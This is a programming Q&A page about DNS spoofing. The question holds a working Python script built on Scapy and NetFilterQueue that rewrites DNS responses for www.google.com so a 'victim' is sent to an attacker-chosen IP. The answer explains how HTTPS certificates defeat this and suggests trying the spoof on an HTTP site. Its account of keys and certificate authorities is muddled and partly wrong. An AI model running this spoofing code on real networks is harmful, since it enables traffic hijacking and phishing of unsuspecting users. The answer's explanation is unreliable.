使用 Python 和 NetFilterQueue 进行 DNS 欺骗

Question

I've made a little script in Python to spoof DNS Requests and Responses so I can redirect the victim to a certain website when they search like "wwww.google.com". At the moment it only works in Python2 since NetFilterQueue in Python3 raises an Attribute error for the set_payload method.

Here's the code:

import netfilterqueue
import scapy

from scapy.layers.inet import IP, UDP
from scapy.layers.dns import DNSRR, DNSQR, DNS


def processPacket(packet): # packte is str
    scapy_packet = IP(packet.get_payload()) 

    if scapy_packet.haslayer(DNSRR):
        qname = scapy_packet[DNSQR].qname
        if "www.google.com" in qname.decode("utf-8"):
            print("*** Spoofing target ***")

            # creating response
            response = DNSRR(rrname = qname, rdata = "IP")
            scapy_packet[DNS].an = response
            scapy_packet[DNS].ancount = 1

            del scapy_packet[IP].len
            del scapy_packet[IP].chksum

            del scapy_packet[UDP].len
            del scapy_packet[UDP].chksum


            packet.set_payload(str(scapy_packet)) 

    packet.accept() 
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, processPacket) 
queue.run()

In order to execute this you need to set your iptables correctly to trap packets inside a queue. It actually works, if I target www.google.com and set a specific IP (in the code I left the rdata field as IP, you should place a real address) and I ping www.google.com I will receive the IP that I set in the code as a response BUT when I actually type www.google.com in the search bar (Firefox) the page will not load and it will throw an error. I've tried it locally, I've also set an Apache2 server on the machine so I am supposed to see the Apache2 page when I search for www.google.com.

Is this due to the fact that Google uses HTTPS? Or it is more like a security configuration on my router?

Thank you!

Answer 1

Google or facebook or some website is protected by ssl of https

So the Main question is

For instance, You have a little business, and you now have a website call , but you want your custom feel more safety while he is visiting your website. so you find a certificate authority or (CA) for giving you a certificate and a public key and also a private key(I will explain it later) for your website.

They are a company or organization well, they will confirm that you are the one who own the domain, and not the malicious people and also confirm yourwebsite.com is who you said you are.

And also, after the authentication or validate of who you are? They will give you a certificate and the public key and private key

www.yourwebsite.com will be the only one who own and decrypt the message and read it with Private Key

And if I want to have a private communication with www.yourwebsite.com , the broswer will told the website. I want to have a private communication with you now, and then www.yourwebsite.com will send the certificate and the public key which is the only key will encrypt the message with cryptographic. Even if the hacker sniffed my packet, he is not able to read the message inside

EXAMPLE: public key is the only key can lock the box, and private key is the only key can unlock the box which owned by you

After the server send out the certificate and the public key out, your browser will check if it is real www.yourwebsite.com instead of the other website pretend them to be yourwebsite. If not, the browser will then occur a error or just disconnected, if yes, the browser will then sending the encrypted message out to the server.

Go try to dnsspoof http://www.ter.com or another http website to see if it is real

NO, https and ssl just only make your packet traffic more secure, it didn't really secure the website, every website with ssl or not , is possible to have bug which the attacker can attack,

And Now, Congrats that we all can browsing under the protect of ssl!